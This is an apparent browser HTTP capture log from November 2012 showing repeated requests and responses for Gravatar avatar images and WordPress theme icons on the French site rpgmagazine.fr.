Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46ED)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331996174
Content-Length: 6156
GET /avatar/1c88ccfca8f09f20c59eb362d6db10bd?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1c88ccfca8f09f20c59eb362d6db10bd?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099706
Content-Length: 2797
GET /avatar/5a453030bbe94edd4e14b682c4060d91?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/5a453030bbe94edd4e14b682c4060d91?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4679)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818249
Content-Length: 5433
GET /avatar/8f8e21c4003f5712fb77db179f50affd?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/8f8e21c4003f5712fb77db179f50affd?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331996079
Content-Length: 5390
GET /avatar/7cab989731863a103711c93dd6dba653?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/7cab989731863a103711c93dd6dba653?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460273139
Content-Length: 4961
GET /avatar/cbb26c1836777876ea77b68b6142a6b1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/cbb26c1836777876ea77b68b6142a6b1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163627
Content-Length: 4208
GET /avatar/86dbfaef0f6099af04fb07d80b89de21?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/86dbfaef0f6099af04fb07d80b89de21?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818266
Content-Length: 3690
GET /avatar/2ea8f517c30811f681308608f0034cb4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/2ea8f517c30811f681308608f0034cb4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/467E)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099729
Content-Length: 4163
GET /avatar/5c12807a069bc9df64225c73c50e4716?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/5c12807a069bc9df64225c73c50e4716?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818291
Content-Length: 4323
GET /avatar/09daa9fe9c59bc19ad76f188523fe7d3?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/09daa9fe9c59bc19ad76f188523fe7d3?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448590
Content-Length: 5980
GET /avatar/ab8064e6b480b89a8a3e48d16912b9d4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ab8064e6b480b89a8a3e48d16912b9d4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276238091
Content-Length: 4480
GET /avatar/de7aa522ea829b4b4f58e2ddb68f94a1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/de7aa522ea829b4b4f58e2ddb68f94a1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3552576456
Content-Length: 4764
GET /avatar/0bbcf58610c56b67f75f8423b6058f01?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0bbcf58610c56b67f75f8423b6058f01?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163663
Content-Length: 5643
GET /avatar/640dcd8aaefb317f04eb3bb81729b09e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/640dcd8aaefb317f04eb3bb81729b09e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119495
Content-Length: 3680
GET /avatar/79e2aeef139e452802b542a307330b79?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/79e2aeef139e452802b542a307330b79?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448603
Content-Length: 5016
GET /avatar/9a657df775b0a05e185b3c870577a0de?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9a657df775b0a05e185b3c870577a0de?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46ED)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331955
Content-Length: 3530
GET /avatar/0092dd07e053afdc4f54953d7f879d91?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0092dd07e053afdc4f54953d7f879d91?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099765
Content-Length: 6649
GET /avatar/b9396280acd909732581d33e7e628eca?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b9396280acd909732581d33e7e628eca?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163674
Content-Length: 6061
GET /avatar/e001ea314ad95beb6c3c0dd2caba5ceb?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/e001ea314ad95beb6c3c0dd2caba5ceb?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331996130
Content-Length: 5964
GET /avatar/c1cbbdf46a90eb18bfe19a4b8f1c9674?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c1cbbdf46a90eb18bfe19a4b8f1c9674?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331996135
Content-Length: 3552
GET /avatar/6da1649a7ba239714d65dfd9d8bee2d4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6da1649a7ba239714d65dfd9d8bee2d4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331996136
Content-Length: 6095
GET /avatar/6533cb47653c85eff577ed45bc18e45b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6533cb47653c85eff577ed45bc18e45b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/467E)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099823
Content-Length: 4507
GET /avatar/324fbd4421fdeb531a5653a046c06af7?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/324fbd4421fdeb531a5653a046c06af7?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276238155
Content-Length: 4771
GET /avatar/13aaf2a0ebe998365f5acb58f2b39076?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/13aaf2a0ebe998365f5acb58f2b39076?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/467E)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460273215
Content-Length: 3979
GET /avatar/7fdb5d045b24624be69061d90c74fc9d?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/7fdb5d045b24624be69061d90c74fc9d?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818333
Content-Length: 4588
GET /site/wp-content/themes/eGamer/images/comment-author.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 02:28:28 GMT
Etag: &quot;18382fa-a2-461fa6d298b00&quot;
Accept-Ranges: bytes
Content-Length: 162
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/comment-email.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:53 GMT
Etag: &quot;18382fe-e2-461f3a8284040&quot;
Accept-Ranges: bytes
Content-Length: 226
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/comment-website.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
